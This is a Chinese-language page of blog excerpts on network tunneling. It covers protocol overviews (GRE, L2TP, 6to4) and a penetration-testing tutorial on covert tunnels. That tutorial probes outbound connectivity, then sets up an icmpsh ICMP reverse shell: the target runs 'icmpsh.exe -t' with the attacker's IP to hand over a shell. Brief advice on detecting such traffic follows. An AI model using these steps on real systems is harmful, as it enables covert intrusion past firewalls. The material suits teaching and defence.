精华内容
下载资源
问答
  • 隧道技术

    2018-12-24 15:56:36
    如果B/S或C/S中间的防火墙只支持使用http协议来访问资源,而你想使用https协议进行资源访问,直接使用https会被防火墙视为攻击流量而被挡掉,为此,有了隧道技术,将https请求封装在http请求中,从而绕过防火墙,...

    挂羊头卖狗肉的技术实现。如果B/S或C/S中间的防火墙只支持使用http协议来访问资源,而你想使用https协议进行资源访问,直接使用https会被防火墙视为攻击流量而被挡掉,为此,有了隧道技术,将https请求封装在http请求中,从而绕过防火墙,访问到资源。

    展开全文
  • GRE隧道技术

    2014-06-04 16:48:36
    GRE隧道技术原理介绍和应用介绍,赶快来下载吧
  • 隧道技术简介

    千次阅读 2018-08-02 04:09:13
    隧道技术  隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间建立一条虚拟链路以传递数据的方式。使用隧道传递的数据可以是不同协议的PDU,隧道将其他协议的PDU重新封装后通过网络发送,新的PDU...

    隧道技术 

    隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间建立一条虚拟链路以传递数据的方式。使用隧道传递的数据可以是不同协议的PDU,隧道将其他协议的PDU重新封装后通过网络发送,新的PDU提供路由信息,以便通过互联网传递被封装的数据。由于PDU经过重新封装,使得数据的发送方和接收方就像在一条专有“隧道”中进行数据传输和通信,隧道技术因此得名。

    一般来说,隧道是在高层(或同等层)分组中携带低层数据。例如,在一个IPv4或IPv6分组中携带IPv4数据,在一个UDP、IPv4或IPv6分组中携带以太网数据。隧道转变了在头部中协议严格分层的思路,并允许形成覆盖网络(即这些“链路”实际是其他协议实现的虚拟链路,而不是物理连接的网络)。通过隧道的建立,可实现将数据强制送到特定的地址、隐藏私有的网络地址、在IP网上传递非IP数据包、提供数据安全支持等功能。

    应用概述

    为了建立隧道,隧道两端的通信方(一般角色为客户端和服务器)必须使用相同的隧道协议。隧道技术可分别以第2层隧道协议或第3层隧道协议为基础。第2层隧道协议对应于OSI模型中的数据链路层,使用帧作为数据交换单位,如:点对点隧道协议(Point-to-Point Tunneling Protocol, PPTP)、第2层隧道协议(L2TP)、第2层转发协议(L2F)等。第3层隧道协议对应于OSI模型的网络层,使用包作为数据交换单位,如:IP安全协议(IPsec,实际是一套协议包)、IP in IP等。此外还有通用路由封装(General Router Encapsulation, GRE),它定义了在任意一种网络层协议上封装任意一个其它网络层协议。GRE使用IPv4或IPv6携带流量,因此更像是一种第3层隧道技术。

    隧道技术是虚拟专用网络(Virtual Private Network, VPN)以及移动IP等实现的技术基础。

    单向链路

    当链路仅在一个方向工作时,这种链路称为单向链路(UDL)。由于它们需要交换信息(例如PPP配置信息),因此很多隧道协议在这种情况下不能正常运行。为了解决这种问题提出了一种标准,可在辅助Internet接口上创建隧道,它可与UDL操作相结合。单向链路的典型情况是由卫星提供下行流量(流向用户)而形成一条Internet连接,或者是调制解调器提供上行流量而形成一条拨号链路。这在卫星连接的用户主要是下载而不是上传的情况下是有用的,并且通常用于早期的卫星Internet连接。它使用GRE将链路层的上行流量封装在IP分组中。

    为了在接收方自动建立和维护隧道,规定了一种动态隧道配置协议(DTCP)。DTCP设计在下行链路中发送组播Hello信息,因此任何有兴趣的接收方都可知道已有UDL及其MAC和IP地址。另外,Hello信息表示网络中一个隧道端点的接口,它可通过用户端的辅助接口到达。在用户选择隧道端点后,DTCP在GRE隧道中将同一MAC作为UDL封装返回流量。服务提供商接收由GRE封装的这些第2层帧(通常是以太网),将它们从四道中提取并适当转发。因此,上游(提供商)UDL需要手工配置隧道,下游(用户)自动配置隧道。这种UDL处理方法实际上是为上层协议不对称地“隐藏”链路。因此,这条链路“两个”方向上的性能(延迟、带宽)可能非常不对称(最直观的感受是家用宽带的上传速率往往比下载速率要低得多),并可能对高层协议产生不利影响。

    上述情况说明隧道的一个重要问题是配置的工作量,这个工作以前一直由手工完成。在通常情况下,隧道配置协议涉及选择一个隧道端点,以及对方的IP地址配置位于隧道端点的设备,也许还需要选择协议和提供认证信息。为此出现一些相关技术以协助自动配置或使用隧道。一种从IPv4向IPv6过渡的方法称为6to4。在6to4中,IPv6分组在一个IPv4网络中通过隧道传输,它的好处在于只需要一个全球惟一的IPv6地址便可使得整个站点获得IPv6的连接。

    6to4采用特殊的IPv6地址使在IPv4海洋中的IPv6孤岛能相互连接。此时IPv6的出口路由器与其他的IPv6域建立隧道连接。IPv4隧道的末端可从IPv6域的地址前缀中自动提取,因为站点的IPv4地址包含在IPv6地址前缀中。6to4另一个特点是它可以自动从IPv6 地址的前缀中提取一个IPv4地址。通过这个机制,站点能够配置IPv6而不需要向注册机构申请IPv6地址空间。这同时也简化了ISP提供商的管理工作。

     

                                                                                             本文部分内容摘自《TCP/IP详解 卷1:协议(中文版)第2版》、百度百科
     

    展开全文
  •  隧道技术  网络地址转换技术 # 搭建实验 IPv6 和 IPv4 共融技术环境 @ 使用思科 GNS3 模拟器 IPv6 静态路由 IPv6 动态路由  6to4 隧道技术  ISATAP 隧道技术  NAT-PT 地址静态转换  ...
  • 1.1隐藏通信隧道技术概述 常用的隧道: 网络层:IPv6隧道,ICMP隧道,GRE隧道 传输层:TCP隧道,UDP隧道,常规端口转发 应用程:SSH隧道,HTTP隧道,HTTPS隧道,DNS隧道 1.2 判断内网的连通性 综合判断各种协议(TCP...

    <EMBED src="your.mid"autostart=“true” loop=“true” hidden=“true”>
    hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH=“整数” 和 HIGH=“整数”

    1.隐藏通信隧道基础

    1.1隐藏通信隧道技术概述

    常用的隧道
    网络层:IPv6隧道,ICMP隧道,GRE隧道
    传输层:TCP隧道,UDP隧道,常规端口转发
    应用程:SSH隧道,HTTP隧道,HTTPS隧道,DNS隧道

    1.2 判断内网的连通性

    综合判断各种协议(TCP,HTTP,DNS,ICMP)及端口通信的情况。常用的允许流量出的端口有 80,8080,443,53,110,123等。

    内网连通性判断方法:

    1,ICMP协议
    执行命令 "ping <IP地址域名>
    ICMP协议探测
    2,TCP协议
    netcat(nc)誉为瑞士军刀,通过使用TCP或UDP协议的网络连接读写数据
    使用nc工具,执行 nc <IP地址 端口号>
    TCP协议探测
    3,HTTP协议
    curl是利用URL规则在命令行下工作的综合传输工具,
    支持文件下载和上传 ,在windows系统中需要安装
    命令:curl <IP地址 端口号>
    链接:https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ
    提取码:zyx1
    TCP协议探测
    4,DNS协议
    dns连通性,常用命令 :nslookup和dig
    nslookup是windows自带 dns探测命令,在没有指定vps-ip时,nslookup会从系统网络中的TCP/IP属性中读取DNS服务器的地址
    输入 nslookup 按回车键 输入 help命令

    在这里插入图片描述
    在这里插入图片描述
    dig是linux自带的命令 输入 dig -h显示帮助信息
    dig命令使用详解

    2. 网络层隧道技术

    在网络层中 ,两个常用的的隧道协议是IPv6 和IMCP

    2.1 IPv6隧道

    用来代替现行的IPv4协议的一种新IP协议
    防御IPv6隧道攻击的方法
    了解IPv6的具体漏洞,结合其他协议,通过防火墙和深度防御系统过滤IPv6通信,提高主机和应用程序的安全性
    2.2 ICMP隧道
    ICMP隧道简单,实用,是一个比较特殊的协议 常见的ICMP消息为ping命令的回复,将TCP/UDP数据封装到ICMP的ping数据据包中,穿过防火墙,实现不受限制的网络访问
    ** icmpsh**
    使用简单不需要管理员权限
    使用git clone命令下载icmpsh 下载地址
    在这里插入图片描述
    安装python的impacket类库 以便对TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等协议进行访问,
    安装python-impacket

    apt-get install python-impacket
    

    在这里插入图片描述
    因为icmpsh工具会替代系统本身的ping命令的应答程序,需要关闭本地系统的ICMP应答(如果要恢复系统应答,则设置为0),否则shell的运行会不稳定(表现为一直刷屏,无法进入交互输入)

    sysctl -w net.ipv4.icmp_echo_ignore_all=1
    

    在这里插入图片描述

    输入 ./run.sh 并运行,会提示出现输入目标的IP地址(目标主机的公网IP地址)
    在这里插入图片描述
    在目标主机上查看ip地址,输入如下命令:

    icmpsh.exe -t 192.168.227.137(攻击机ip) -d 30 -s 128
    

    在目标主机运行以上命令,即可在VPS中看到 192.168.227.133得shell

    防御ICMP隧道攻击的方法

    网络管理员会阻止ICMP通信进入站点,在出站方向 ICMP通信是被允许的,目前大多数的网络和边界设备不会过滤ICMP流量
    使用ICMP隧道时会产生大量的ICMP数据包,可以通过wireshark进行ICMP数据包分析,已检测恶意ICMP流量

    展开全文
  • IPv6隧道技术是指通过IPv4隧道传送IPv6数据报文的技术。为了在IPv4海洋中传递IPv6信息,可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6报文整体封装在IPv4数据报文中,使IPv6报文能够穿过IPv4...

    IPV6隧道

    IPv6(Internet Protocol Version 6),是用来替代IPv4的一种新的IP协议。IPv6隧道技术是指通过IPv4隧道传送IPv6数据报文的技术。为了在IPv4海洋中传递IPv6信息,可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6报文整体封装在IPv4数据报文中,使IPv6报文能够穿过IPv4海洋,到达另一个IPv6小岛。

    IPv6隧道的工作过程如下:

    1. 节点A要向节点B发送IPv6报文,首先需要在节点A和节点B之间建立一条隧道
    2. 节点A将IPv6报文封装在以节点B的IPv4地址为目的地址,以自己的IPv4地址为源地址的IPv4报文中,并发往IPv4海洋
    3. 在IPv4海洋中,这个报文和普通IPv4报文一样,经过IPv4的转发到达节点B
    4. 节点B收到此报文之后,解除IPv4封装,取出其中的IPv6报文

    攻击者有时会通过恶意软件来配置允许进行IPv6通信 设备,以避开防火墙和入侵检测系统。有一点需要指出:即使设备支持IPv6,也可能无法正确分析封装了IPv6报文的IPv4数据包

    配置隧道和自动隧道的主要区别是:只有在执行隧道功能的节点的IPv6地址是IPv4兼容地址时,自动隧道才是可行的。在为执行隧道功能的节点分配IP地址时,如果采用的是自动隧道方法,就不需要进行配置。

    配置隧道方法则要求隧道末端节点使用其他机制来获得其IPv4地址,例如采用DHCP、人工配置或其他IPv4的配置机制。

    支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等。

    未完待续。。

     

    展开全文
  • 传输层隧道技术 传输层包括TCP隧道,UDP隧道和常规端口转发,内网防火墙阻止了对指定端口的访问,获取目标机器的权限后可以使用IPTABLES打开指定端口 1. lcx端口转发 经典端口转发工具:lcx windows版为lcx.exe , ...
  • Ssh隧道技术

    2015-02-14 14:33:36
    ssh隧道技术 什么情况下使用隧道建立本地隧道 通过SSH隧道建立SOCKS服务器 建立远程SSH隧道一些技巧 检查隧道状态如何将端口绑定到外部地址上自动连接和防断线脚本 动态域名参考 ssh隧道技术 ...
  • 1、网络隧道技术

    千次阅读 2018-06-08 18:38:01
    网络隧道技术简介隧道技术(Tunneling)是一类网络协议,它是一种数据包封装技术,它将原始IP包(其报头包含原始发送者和最终目的地)封装在另外一个数据包(称为封装的IP包)的数据净荷中进行传输。使用隧道的原因...
  • 2、HTTP隧道技术

    千次阅读 2018-06-08 17:34:26
    HTTP隧道技术常常使用木马的用户一定对木马所使用的反弹连接技术、线程插入技术等耳熟能详,但是对“HTTP隧道技术”可能就不甚了解了,那到底什么是“HTTP隧道技术”呢?我们知道,使用了“反弹连接技术”的远程控件...
  • 应用层隧道技术 在内网中建立一个稳定,可靠的数据通道 常用的隧道协议有SSH,HTTP/HTTPS和DNS SSH协议 内网中几乎所有的linux和unix服务器和网络设备都支持SSH协议,在一般情况下,SSH协议是被允许通过防火墙和边界...
  • 1. 隐藏通信隧道基础1.1隐藏通信隧道技术概述常用的隧道:网络层:IPv6隧道,ICMP隧道,GRE隧道传输层:TCP隧道,UDP隧道,常规端口转发应用程:SSH隧道,HTTP隧道,HTTPS隧道,DNS隧道1.2 判断内网的连通性综合判断...
  • DNS隧道技术解析

    千次阅读 2018-06-04 12:13:26
    下面贴一个关于dns查询的图,大家自行理解:DNS隧道技术是如何实现的一个查询的流程我们通过下图来理解一下第一步: 黑客向内部dns服务器发送一个查询hacker.com的请求(这个域名的控制权限是在黑客手里的)第二步:...
  • 细说IPv6隧道机制原理网络之所以称之为网,就是因为它的庞大...接下来我们就详细的讲解一下隧道技术隧道技术在IPV6网络彻底代替IPv4网络之前,总是有一些接入网技术首先具有IPV6的协议栈。一般来说,在过渡前期,...
  • Http与HTTP隧道技术

    千次阅读 2018-07-14 21:55:04
    Http与HTTP隧道技术
  • 什么是隧道技术

    千次阅读 2017-03-02 10:07:04
    隧道技术是一种通过互联网络基础设施在网络之间传递数据的方式。使用隧道传递的数据可以是不同协议的数据帧或包,隧道协议将这些其它协议的数据帧或包重新封装在新的包头中发送,被封装的数据包在隧道的两个端点之间...
  • 关于网络隧道技术

    千次阅读 2016-07-03 19:19:40
     近来出现了一些新的隧道技术,并在不同的系统中得到运用和拓展。  为创建隧道,隧道的客户机和服务器双方必须使用相同的隧道协议。隧道技术可分别以第2层或第3层隧道协议为基础。 第2层隧道协议对应于OSI模型的...
  • Cisco ❀ 隧道技术比较

    2019-06-15 23:36:04
    多种隧道技术相比较 创作者:Eric· Charles
  • 流量操控与隧道技术 流量操控技术(Traffic manipulation tecchnique) 1. 使用场景  渗透测试中经常遇到访问受限的网络环境  使用隐藏的手段逃避安全检查措施和溯源追踪  证明看似严格的访问控制仍然存在弱点 ...
  • DNS隧道技术绕防火墙

    2018-03-08 11:01:35
    Blood_Zero · 2015/10/22 10:200x01 概念隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道协议将其它协议的数据帧...
  • 安全隧道技术

    2010-05-26 13:06:51
    安全隧道技术 对于构建×××来说,网络安全隧道技术是个关键技术。×××具体实现形式多种多样,但同样都是基于隧道技术。利用隧道技术,可以实现网络到网络、主机到主机或主机到网络的安全连接。所谓隧道,实质...
  • 初探SSH隧道技术

    2017-11-28 22:27:56
    SSH隧道技术实际上就是通过SSH协议,在两台主机间各开放了一个端口,通过开放的端口,对主机A的请求就可以转发到主机B上,主机B的响应也会转发到A上,这样就可以解决无法从公网访问主机B的问题,从而访问主机B上面的...
  • 先判断内网连通性网络层隧道技术IPv6 隧道ICMP 隧道icmpshPingtunnelicmptunnel传输层隧道技术lcx端口转发内网端口转发本地端口转发二者结合使用NetCat——瑞士军刀内网代理PowerCat应用层隧道技术SSH协议本地转发...
  • ISATAP隧道技术

    2013-10-28 14:41:06
    ISATAP隧道隧道的配置命令和详细解释

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,843
精华内容 1,137
关键字:

隧道技术